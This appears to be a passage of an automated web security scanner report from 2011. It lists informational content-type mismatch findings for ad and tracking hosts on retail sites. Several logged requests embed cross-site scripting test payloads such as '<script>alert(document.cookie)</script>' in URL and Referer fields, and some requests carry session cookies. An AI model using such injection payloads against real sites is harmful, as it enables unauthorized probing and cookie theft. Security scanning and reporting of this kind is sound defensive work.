Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/1469778385

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1469778385?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Fc5205--%253E%253Cscript%253Ealert%2528document.cookie%2529%253C/script%253Ebb446d17c91%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:57:23 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:57:23 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1469778385]]);

26.5. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1491479342 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/1491479342

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1491479342?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/10%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:55:06 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:55:06 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1491479342]]);

26.6. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1537867128 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/1537867128

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1537867128?mr='11029'&mi='1.1817838745.1305510198897'&mt=!n&cs=!t&e=!(viewPage)&pt=unknown&r='http://app.gnc.com/profile/profile.cfm'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.gnc.com/community/index.jsp%2520%2520'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:16:31 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:16:31 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1537867128]]);

26.7. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1729776125 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/1729776125

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1729776125?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/11%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Fc5205--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253Ebb446d17c91%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb446d17c91=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:56:42 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:56:42 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1729776125]]);

26.8. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/180141734 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-721e8746/p/gnc.com/180141734

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/180141734?mr='11029'&mi='1.1817838745.1305510198897'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.gnc.com/home/index.jsp'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:58:32 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:58:32 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 180141734]]);

26.9. http://a.monetate.net/trk/3/s/a-835fc909/p/orientaltrading.com/927745947 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-835fc909/p/orientaltrading.com/927745947

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-835fc909/p/orientaltrading.com/927745947?mr='11011'&mi='1.322159034.1305510206640'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.orientaltrading.com/'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:59:02 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:59:02 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 927745947]]);

26.10. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800?mr=%2711043%27&mi=%271.1280321277.1305543014584%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/7%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E3105c4c3d6e%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:51:38 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:51:38 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1276278800]]);

26.11. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r='http://burp/show/5'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E3105c4c3d6e%3D1'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3105c4c3d6e=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:49:30 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:49:30 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1821464581]]);

26.12. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r='http://www.petsmart.com/'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/%3Frdir%3D1A'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:17:58 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:17:58 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 2142672001]]);

26.13. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:53:12 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:12 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 491884791]]);

26.14. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.monetate.net
Path:	/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637?mr=%2711043%27&mi=%271.1280321277.1305543014584%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/6%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(1)%253C/script%253E3105c4c3d6e%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 10:50:15 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:50:15 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 598788637]]);

26.15. http://a.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.netmng.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=088 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDad03954oMJMO7WqpnWrrDMOCdn8evhqLOus%2BDQoPhsn%2F566k%2FGwherLQ%2BEproF%2FXCsIj6ePCALj490tqdsXftKlyucODCitvFWBdAgtROhvhD%2F7o26%2F%2BaEXVdVfq0G2doyxfkgyjSVyEZ%2FKAFp0nXXviPcrzm0IBT9XrJaZhX4JHOdh009L6zCpw6vMEnwqgdhN1DhFzCDraO68xpe%2FygxfmfP5TA1ix0UfsfAVCJTBISQw%2FzSEkLmXlrBkGfU3z%2B2dNGQUP%2FXkGxf5Hu3EWLAE1mNycF4idA%2FpxTiry%2F8XmVNfippJQMpikbh5xcYcDBtG6F8xlFyLXsPkRHcxaf2Lsw8MISxRYyleY%2BZNvUnSrP9rawvOQgafzyBsl8LHMs

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:33:12 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 10:33:12 GMT
Last-Modified: Sat, 14 May 2011 10:33:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CKz%2FsqEZUicFPMyEDsXHH1MSW%2BZI3Y4yZsY2TZYK0lme6J0%2F%2F5cJj4i5QIpKwPczgJZAQNrXz2j7XZmq5jtawoEWziapdMaIEeagfIatlF5XjqUVYDeuzym%2B3L3DvzwFZqAGftusSA7%2FH6h5uOHqAdek3yS%2FDEnd5IaL9HCki%2Fj3OLpZ2oegNjDsnPLpvDUDbbzrGpO3yDBMmQflpaJVA5e04Awv4pjXY7ie%2Fsgk76QC984EszuNAmIlWrEv8DXkUuTmTPdLwjxFAwx2HAQguuI%2BSgSjDfAORVbob%2BBB%2By9vd0hGWqn%2Bo75V1p6N%2BXuyc62lXVjgoCXBaYN4jtjvlc8q63gOwLcZhjBJYJIooWQL%2BKfA0YSh2JVSRn95lYitY%2FHBfCzrA1FHVZBtBPy5fwTqgZvNgXSnyElnAyt%2F9gI1R4SXed7OZN8I2IfPH1MoaWsEEPd7tIYwWhCfzLvR%2FC1bDICQV8%2F91PU0i6SZ%2FMNPTfOIDgKVxE6PEOxcd7hsvAImGEECynTh9E0Px5eHg2W13MvQNn8pgmxbwiBg2Qxw%3D; expires=Tue, 15-Nov-2011 10:33:12 GMT; path=/; domain=.netmng.com
Content-Length: 748
Connection: close
Content-Type: text/html; charset=UTF-8

var i=document.createElement('IMG'); i.src='http://beacon.afy11.net/ad?mode=4&ac=0&av=9990862&rand=899967993'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.body.appendChild(i);
...[SNIP]...

26.16. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ace.imageg.net
Path:	/graphics/product_images/pACE3-4403835th.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /graphics/product_images/pACE3-4403835th.jpg HTTP/1.1
Host: ace.imageg.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: TUX/2.0 (Linux)
Content-Type: image/jpeg
Content-Length: 3265
ETag: "3265-ehifeign"
Accept-Ranges: bytes
Last-Modified: Wed, 09 Jan 2008 22:19:25 GMT
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:47:27 GMT
Connection: close

......JFIF.....H.H.....C...............
.

...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......P.P.................................
...[SNIP]...

26.17. http://action.media6degrees.com/orbserv/hbjs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT

(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

26.18. http://app.gnc.com/profile/javascript/utils.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://app.gnc.com
Path:	/profile/javascript/utils.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /profile/javascript/utils.js HTTP/1.1
Host: app.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:11 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2004 11:20:50 GMT
ETag: "f7acb-b49-3e7e4b7a90880"
Accept-Ranges: bytes
Content-Length: 2889
Content-Type: application/x-javascript

REGEX_NON_ASCII = new RegExp("[^\\x00-\\x7F]");
REGEX_EMAIL = new RegExp("^([^()<>@,;:\\\\\".\\s\\x00-\\x1F\\x7F\\[\\]]+|\"([^\\\\\"\\x0D]|\\\\.)*\")(\\.([^()<>@,;:\\\\\".\\s\\x00-\\x1F\\x7F\\[
...[SNIP]...

26.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.20. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://dms.netmng.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.21. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.22. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ipinvite.iperceptions.com
Path:	/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/ip_Layer_Invitation_903.aspx HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 16 May 2011 01:52:36 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR11
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.js';var script = document.createElement('script'); script.setA
...[SNIP]...

26.23. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mbox12.offermatica.com
Path:	/m2/guitarcenter/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.24. http://px.steelhousemedia.com/pr previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.25. http://rya.rockyou.com/ams/ptrck.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rya.rockyou.com
Path:	/ams/ptrck.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.26. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.27. http://sales.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

